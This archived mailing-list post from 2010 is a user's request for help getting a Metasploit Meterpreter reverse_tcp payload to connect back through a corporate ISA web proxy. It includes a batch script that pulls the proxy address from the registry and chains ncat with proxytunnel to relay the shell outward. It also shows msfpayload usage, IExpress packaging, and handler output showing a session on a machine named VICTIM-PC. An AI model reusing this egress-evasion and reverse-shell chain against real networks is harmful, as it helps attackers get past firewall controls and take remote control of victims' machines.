Home page logo

metasploit logo Metasploit mailing list archives

Tunelling Meterpreter connections through HTTP/S Proxy servers
From: "Sherif Eldeeb" <archeldeeb () gmail com>
Date: Sun, 20 Jun 2010 13:03:15 +0300

I hit a dead end and help is appreciated. 
I've been trying the past few days to get a meterpreter reverse_tcp exe to
connect back through an http proxy, and I had no idea that it's going to be
that difficult "for me", my approach was including another tunneling program
that will listen at a local port for meterpreter's connection and handle the
proxy bypassing, a batch file that will automate the process, then packing
the whole thing with IExpress.

Meterpreter connect locally ==> proxy bypassing program ==> PROXY SERVER
====|Internet|===>  exploit/mutli/handler 

And I've been "partially" successful so far and feel like almost there.

Here's the scenario:
-MS ISA 2006 firewall & web proxy.
-Outbound ports allowed : only 80 & 443 through webproxy, 110, 25 and 21
with some kind of protocol filtering.
-Inbound open ports: none, externally exposed Services & servers: none.
-Solution must be valid if a restricted user executed the program.

Long story short, Here's what I found so far:
-for those who didn't try before, Just using LPORT as 80 or 443 doesn't work
because of the web proxy, it even made the meterpreter.exe grow in memory
usage to more than 1.5gb and HDD swapping like crazy, CPU 100%.
-Using port 110 or 25 initially connects, but gets dropped immediately by
the firewall's protocol filter when it detects that the data being sent is
not actually what it should be.
-Reverse_https & reverse_http payloads are not working as discussed earlier.

I will not list what didn't work for me, but only "proxytunnel" looked like
the one with promising results, but had two serious drawbacks:

1.You have to define the company's proxy server IP address and port number,
which I do not know, So I used "REG" command to extract the data from
2.It works with STDIN & STDOUT "not listening on ports AFAIK": I used "ncat
-c" to listen on the local port and redirect the connection to the

Here's the bat file that did both:
@echo off
for /f "tokens=3 delims=^ " %%a IN ('reg query
"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v
ProxyServer ^| find "Proxy"') DO set PRXY = %%a
ncat -k -l 4455 -e "proxytunnel.exe -q -N -p %prxy% -d

Proxytunnel "-q" quiet "-N" use NTLM auth. "-p" Proxyserver "-d"

And then make msfpayload windows/meterpreter/reverse_tcp LHOST=
LPORT=4455, and putting the programs together in one folder, then execute
the payload.exe.
Guess what? It Works! Sort of :(

msf exploit(handler) >
[*] Sending stage (748032 bytes) to
[*] Meterpreter session 1 opened (MyMultiHandlerServer:443 -> at
2010-06-20 07:40:47 +0000
sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: VICTIM-PC
OS      : Windows Vista (Build 6002, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter > sysinfo
Computer: VICTIM-PC
OS      : Windows Vista (Build 6002, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter > ls
[-] Error running command ls: Rex::TimeoutError Operation timed out.
meterpreter > sysinfo
[-] Error running command sysinfo: Rex::TimeoutError Operation timed out.

As you can see, it connects, interacts, then connection dies after a short
while for some reason, the payload.exe, ncat.exe and proxyserver.exe are all
still running,  at the isa monitor it's still indicating that the connection
is established.
same when executing any command like "run winenum" it starts the commands
and records the results, but after 15 to 20 commands, it just dies and times

Away from meterpreter, if I run "ncat -l 443" at the attacking box and "C:\
proxytunnel.exe -q -N -p proxyserver:8080 -d attacking:443" at the victim's
machine, *connection gets past the Proxy*, bidirectional and NEVER gets
dropped, though it's a useless chat program.

Any help is appreciated, really.        

Thanks in advance,

GNU-HTTPtunnel: HTS didn't port-forward nicely to multi/handler
Stunnel: has a nice looking icon in the notification area :) didn't try
Ncat --ssl: for some reason it doesn't accept -e & --ssl together, which
might help.


  By Date           By Thread  

Current thread:
  • Tunelling Meterpreter connections through HTTP/S Proxy servers Sherif Eldeeb (Jun 20)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]